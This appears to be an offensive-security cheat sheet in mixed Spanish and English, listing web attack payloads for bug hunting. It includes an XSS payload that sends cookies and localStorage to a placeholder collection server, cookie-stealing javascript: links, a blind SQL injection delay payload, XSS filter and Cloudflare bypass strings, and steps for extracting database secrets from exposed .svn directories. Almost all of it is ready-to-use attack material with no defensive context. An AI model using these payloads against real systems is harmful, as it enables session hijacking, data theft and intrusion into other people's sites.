Payloads Prohibidos
Agregar parámetro return (Se puede usar para open redirection también):
https://xyz.com/?return=javascript://%250Alert(document.location=document.cookie)
https://xyz.com/?return=https://google.com
https://raw.githubusercontent.com/payloadbox/xss-payload-list/master/Intruder/xss-payload-list.txt
📌Here is An XSS Payload that Steals both Cookies and Local Storage Data 🤯
📌Payload <svg/onload='const url = https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}
; fetch(url);'>"
🚨Discovering DB secrets in SVN repository🚨
Run ./dirsearch.py -u target -e php,html,js,xml -x 500,403
Found http://url.com/.svn/
Clone & use SVN-Extractor
Run ./svn-extractor.py --url http://url.com --match database.php
⚡ Result in output containing secret.
ASP blind SQL Injection in a Login page⚡️ 👉 (Blind-Boolean method)
✅ Payload: ';%20waitfor%20delay%20'0:0:6'%20--%20
Payload para agregar tag o skill:
<a/href=”javascript:alert(document.cookie)”>ClickMe
XSS payload : <img src%3Dx onerror%3D"\u0061\u006C\u0065\u0072\u0074 (1)">
Bypass 403
both %0d and %0a work
CVE-2022-22978 - Spring Security Admin Bypass PoC
DOM XSS en AVG
📌If you find a file upload function for an image, try introducing an image with XSS in the filename like so 👇
Tech 1:
/?xss=<svg/onload=eval('
+URL)>#';alert(document.domain)
cloudflare bypass
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
CRLF
Last updated